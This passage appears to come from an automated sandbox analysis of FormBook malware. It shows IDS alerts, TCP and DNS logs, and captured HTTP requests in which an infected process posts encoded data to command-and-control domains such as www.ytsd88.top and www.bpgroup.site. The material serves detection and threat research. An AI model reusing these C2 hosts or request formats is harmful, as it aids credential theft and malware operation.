                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-01-10T20:27:05.356151+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049974154.90.58.20980TCP
                                                        2025-01-10T20:27:22.934808+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997647.76.213.19780TCP
                                                        2025-01-10T20:27:24.879333+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997747.76.213.19780TCP
                                                        2025-01-10T20:27:27.631097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104997847.76.213.19780TCP
                                                        2025-01-10T20:27:30.033407+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104997947.76.213.19780TCP
                                                        2025-01-10T20:27:36.087507+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998074.48.143.8280TCP
                                                        2025-01-10T20:27:38.639796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998174.48.143.8280TCP
                                                        2025-01-10T20:27:41.215893+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998274.48.143.8280TCP
                                                        2025-01-10T20:27:43.729058+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104998374.48.143.8280TCP
                                                        2025-01-10T20:27:50.294439+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998413.248.169.4880TCP
                                                        2025-01-10T20:27:51.777235+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998513.248.169.4880TCP
                                                        2025-01-10T20:27:54.325725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104998613.248.169.4880TCP
                                                        2025-01-10T20:27:56.899908+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104998713.248.169.4880TCP
                                                        2025-01-10T20:28:03.102177+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049988103.21.221.8780TCP
                                                        2025-01-10T20:28:05.835980+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049989103.21.221.8780TCP
                                                        2025-01-10T20:28:08.393691+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049990103.21.221.8780TCP
                                                        2025-01-10T20:28:11.290150+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049991103.21.221.8780TCP
                                                        2025-01-10T20:28:19.527236+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.10499928.218.14.12080TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 10, 2025 20:27:04.400346994 CET4997480192.168.2.10154.90.58.209
                                                        Jan 10, 2025 20:27:04.405316114 CET8049974154.90.58.209192.168.2.10
                                                        Jan 10, 2025 20:27:04.405395031 CET4997480192.168.2.10154.90.58.209
                                                        Jan 10, 2025 20:27:04.415405035 CET4997480192.168.2.10154.90.58.209
                                                        Jan 10, 2025 20:27:04.420253992 CET8049974154.90.58.209192.168.2.10
                                                        Jan 10, 2025 20:27:05.355887890 CET8049974154.90.58.209192.168.2.10
                                                        Jan 10, 2025 20:27:05.356089115 CET8049974154.90.58.209192.168.2.10
                                                        Jan 10, 2025 20:27:05.356151104 CET4997480192.168.2.10154.90.58.209
                                                        Jan 10, 2025 20:27:05.359247923 CET4997480192.168.2.10154.90.58.209
                                                        Jan 10, 2025 20:27:05.363976955 CET8049974154.90.58.209192.168.2.10
                                                        Jan 10, 2025 20:27:21.386276960 CET4997680192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:21.391179085 CET804997647.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:21.391268015 CET4997680192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:21.413971901 CET4997680192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:21.418855906 CET804997647.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:22.934808016 CET4997680192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:22.939810991 CET804997647.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:22.939881086 CET4997680192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:23.953862906 CET4997780192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:23.958985090 CET804997747.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:23.959135056 CET4997780192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:23.974621058 CET4997780192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:23.979783058 CET804997747.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:24.879007101 CET804997747.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:24.879115105 CET804997747.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:24.879333019 CET4997780192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:25.481743097 CET4997780192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:26.500457048 CET4997880192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:26.506139040 CET804997847.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:26.506228924 CET4997880192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:26.521656990 CET4997880192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:26.526633978 CET804997847.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:26.526645899 CET804997847.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:27.630928040 CET804997847.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:27.630969048 CET804997847.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:27.631097078 CET4997880192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:28.028652906 CET4997880192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:29.087775946 CET4997980192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:29.094105959 CET804997947.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:29.094211102 CET4997980192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:29.109637022 CET4997980192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:29.114597082 CET804997947.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:30.033190966 CET804997947.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:30.033222914 CET804997947.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:30.033406973 CET4997980192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:30.036377907 CET4997980192.168.2.1047.76.213.197
                                                        Jan 10, 2025 20:27:30.042105913 CET804997947.76.213.197192.168.2.10
                                                        Jan 10, 2025 20:27:35.512839079 CET4998080192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:35.517807007 CET804998074.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:35.517904997 CET4998080192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:35.534235954 CET4998080192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:35.539077997 CET804998074.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:36.087412119 CET804998074.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:36.087450027 CET804998074.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:36.087490082 CET804998074.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:36.087507010 CET4998080192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:36.087594032 CET4998080192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:37.044244051 CET4998080192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:38.063169003 CET4998180192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:38.068067074 CET804998174.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:38.068190098 CET4998180192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:38.083345890 CET4998180192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:38.088224888 CET804998174.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:38.639672995 CET804998174.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:38.639697075 CET804998174.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:38.639714956 CET804998174.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:38.639796019 CET4998180192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:38.639844894 CET4998180192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:39.591106892 CET4998180192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:40.611412048 CET4998280192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:40.616389990 CET804998274.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:40.616497040 CET4998280192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:40.630244970 CET4998280192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:40.635077953 CET804998274.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:40.635251045 CET804998274.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:41.215569973 CET804998274.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:41.215641975 CET804998274.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:41.215893030 CET4998280192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:41.216532946 CET804998274.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:41.216588020 CET4998280192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:42.138294935 CET4998280192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:43.157152891 CET4998380192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:43.162174940 CET804998374.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:43.162281036 CET4998380192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:43.171972036 CET4998380192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:43.176776886 CET804998374.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:43.728873014 CET804998374.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:43.728897095 CET804998374.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:43.728914976 CET804998374.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:43.729058027 CET4998380192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:43.729109049 CET4998380192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:43.732115030 CET4998380192.168.2.1074.48.143.82
                                                        Jan 10, 2025 20:27:43.737011909 CET804998374.48.143.82192.168.2.10
                                                        Jan 10, 2025 20:27:48.770117998 CET4998480192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:48.774879932 CET804998413.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:48.774947882 CET4998480192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:48.790218115 CET4998480192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:48.794951916 CET804998413.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:50.294439077 CET4998480192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:50.348510981 CET804998413.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:51.313359976 CET4998580192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:51.318207979 CET804998513.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:51.318396091 CET4998580192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:51.333789110 CET4998580192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:51.338704109 CET804998513.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:51.776446104 CET804998513.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:51.776576042 CET804998513.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:51.777235031 CET4998580192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:52.149866104 CET804998413.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:52.151356936 CET4998480192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:52.844149113 CET4998580192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:53.859641075 CET4998680192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:53.864758015 CET804998613.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:53.864852905 CET4998680192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:53.882965088 CET4998680192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:53.887897015 CET804998613.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:53.887995958 CET804998613.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:54.325609922 CET804998613.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:54.325670004 CET804998613.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:54.325725079 CET4998680192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:55.388261080 CET4998680192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:56.406836987 CET4998780192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:56.411652088 CET804998713.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:56.411727905 CET4998780192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:56.421020031 CET4998780192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:56.425793886 CET804998713.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:56.899673939 CET804998713.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:56.899777889 CET804998713.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:27:56.899908066 CET4998780192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:56.902596951 CET4998780192.168.2.1013.248.169.48
                                                        Jan 10, 2025 20:27:56.907433033 CET804998713.248.169.48192.168.2.10
                                                        Jan 10, 2025 20:28:02.197439909 CET4998880192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:02.202370882 CET8049988103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:02.202445984 CET4998880192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:02.221708059 CET4998880192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:02.226577044 CET8049988103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:03.102021933 CET8049988103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:03.102056980 CET8049988103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:03.102176905 CET4998880192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:03.732374907 CET4998880192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:04.751543999 CET4998980192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:04.931277990 CET8049989103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:04.931416988 CET4998980192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:04.950292110 CET4998980192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:04.955188990 CET8049989103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:05.835823059 CET8049989103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:05.835854053 CET8049989103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:05.835979939 CET4998980192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:06.466272116 CET4998980192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:07.486690998 CET4999080192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:07.491669893 CET8049990103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:07.494549036 CET4999080192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:07.510123014 CET4999080192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:07.515058994 CET8049990103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:07.515094042 CET8049990103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:08.393552065 CET8049990103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:08.393598080 CET8049990103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:08.393691063 CET4999080192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:09.013071060 CET4999080192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:10.032474041 CET4999180192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:10.037729979 CET8049991103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:10.037807941 CET4999180192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:10.046586990 CET4999180192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:10.051474094 CET8049991103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:11.289968967 CET8049991103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:11.289998055 CET8049991103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:11.290019035 CET8049991103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:11.290047884 CET8049991103.21.221.87192.168.2.10
                                                        Jan 10, 2025 20:28:11.290149927 CET4999180192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:11.290175915 CET4999180192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:11.290182114 CET4999180192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:11.340758085 CET4999180192.168.2.10103.21.221.87
                                                        Jan 10, 2025 20:28:11.345539093 CET8049991103.21.221.87192.168.2.10
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 10, 2025 20:26:59.320297003 CET5057953192.168.2.101.1.1.1
                                                        Jan 10, 2025 20:26:59.336481094 CET53505791.1.1.1192.168.2.10
                                                        Jan 10, 2025 20:27:04.357223034 CET5407653192.168.2.101.1.1.1
                                                        Jan 10, 2025 20:27:04.395339966 CET53540761.1.1.1192.168.2.10
                                                        Jan 10, 2025 20:27:20.551389933 CET6390153192.168.2.101.1.1.1
                                                        Jan 10, 2025 20:27:21.383733034 CET53639011.1.1.1192.168.2.10
                                                        Jan 10, 2025 20:27:35.048243046 CET5670653192.168.2.101.1.1.1
                                                        Jan 10, 2025 20:27:35.510322094 CET53567061.1.1.1192.168.2.10
                                                        Jan 10, 2025 20:27:48.751143932 CET6421053192.168.2.101.1.1.1
                                                        Jan 10, 2025 20:27:48.767805099 CET53642101.1.1.1192.168.2.10
                                                        Jan 10, 2025 20:28:01.920876026 CET5061053192.168.2.101.1.1.1
                                                        Jan 10, 2025 20:28:02.194658995 CET53506101.1.1.1192.168.2.10
                                                        Jan 10, 2025 20:28:17.751358986 CET6538753192.168.2.101.1.1.1
                                                        Jan 10, 2025 20:28:18.603257895 CET53653871.1.1.1192.168.2.10
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 10, 2025 20:26:59.320297003 CET192.168.2.101.1.1.10xfe32Standard query (0)www.grandesofertas.funA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.357223034 CET192.168.2.101.1.1.10xf675Standard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:20.551389933 CET192.168.2.101.1.1.10x27ffStandard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:35.048243046 CET192.168.2.101.1.1.10x4af7Standard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:48.751143932 CET192.168.2.101.1.1.10x9666Standard query (0)www.fortevision.xyzA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:28:01.920876026 CET192.168.2.101.1.1.10x3c6fStandard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:28:17.751358986 CET192.168.2.101.1.1.10xc558Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 10, 2025 20:26:59.336481094 CET1.1.1.1192.168.2.100xfe32Name error (3)www.grandesofertas.funnonenoneA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.395339966 CET1.1.1.1192.168.2.100xf675No error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.395339966 CET1.1.1.1192.168.2.100xf675No error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.395339966 CET1.1.1.1192.168.2.100xf675No error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.395339966 CET1.1.1.1192.168.2.100xf675No error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.395339966 CET1.1.1.1192.168.2.100xf675No error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.395339966 CET1.1.1.1192.168.2.100xf675No error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:04.395339966 CET1.1.1.1192.168.2.100xf675No error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:21.383733034 CET1.1.1.1192.168.2.100x27ffNo error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:35.510322094 CET1.1.1.1192.168.2.100x4af7No error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                        Jan 10, 2025 20:27:35.510322094 CET1.1.1.1192.168.2.100x4af7No error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:48.767805099 CET1.1.1.1192.168.2.100x9666No error (0)www.fortevision.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:27:48.767805099 CET1.1.1.1192.168.2.100x9666No error (0)www.fortevision.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:28:02.194658995 CET1.1.1.1192.168.2.100x3c6fNo error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                        Jan 10, 2025 20:28:02.194658995 CET1.1.1.1192.168.2.100x3c6fNo error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 20:28:18.603257895 CET1.1.1.1192.168.2.100xc558No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                        Jan 10, 2025 20:28:18.603257895 CET1.1.1.1192.168.2.100xc558No error (0)ymx01.cn8.218.14.120A (IP address)IN (0x0001)false
                                                        • www.jijievo.site
                                                        • www.ytsd88.top
                                                        • www.bpgroup.site
                                                        • www.fortevision.xyz
                                                        • www.rtpterbaruwaktu3.xyz
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1049974154.90.58.209806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:04.415405035 CET455OUTGET /z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXr HTTP/1.1
                                                        Host: www.jijievo.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Jan 10, 2025 20:27:05.355887890 CET197INHTTP/1.1 200 OK
                                                        Content-Type: text/html; charset=UTF-8
                                                        Date: Fri, 10 Jan 2025 19:27:05 GMT
                                                        Server: nginx
                                                        Vary: Accept-Encoding
                                                        Content-Length: 24
                                                        Connection: close
                                                        Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                        Data Ascii: Unable to get connection


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.104997647.76.213.197806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:21.413971901 CET707OUTPOST /8qt7/ HTTP/1.1
                                                        Host: www.ytsd88.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.ytsd88.top
                                                        Referer: http://www.ytsd88.top/8qt7/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 196
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 4f 43 65 42 58 2f 51 4b 62 33 66 79 70 48 4d 4b 43 75 50 53 2f 56 59 37 55 34 72
                                                        Data Ascii: KzB47nV=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffOCeBX/QKb3fypHMKCuPS/VY7U4r


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.104997747.76.213.197806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:23.974621058 CET731OUTPOST /8qt7/ HTTP/1.1
                                                        Host: www.ytsd88.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.ytsd88.top
                                                        Referer: http://www.ytsd88.top/8qt7/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 220
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
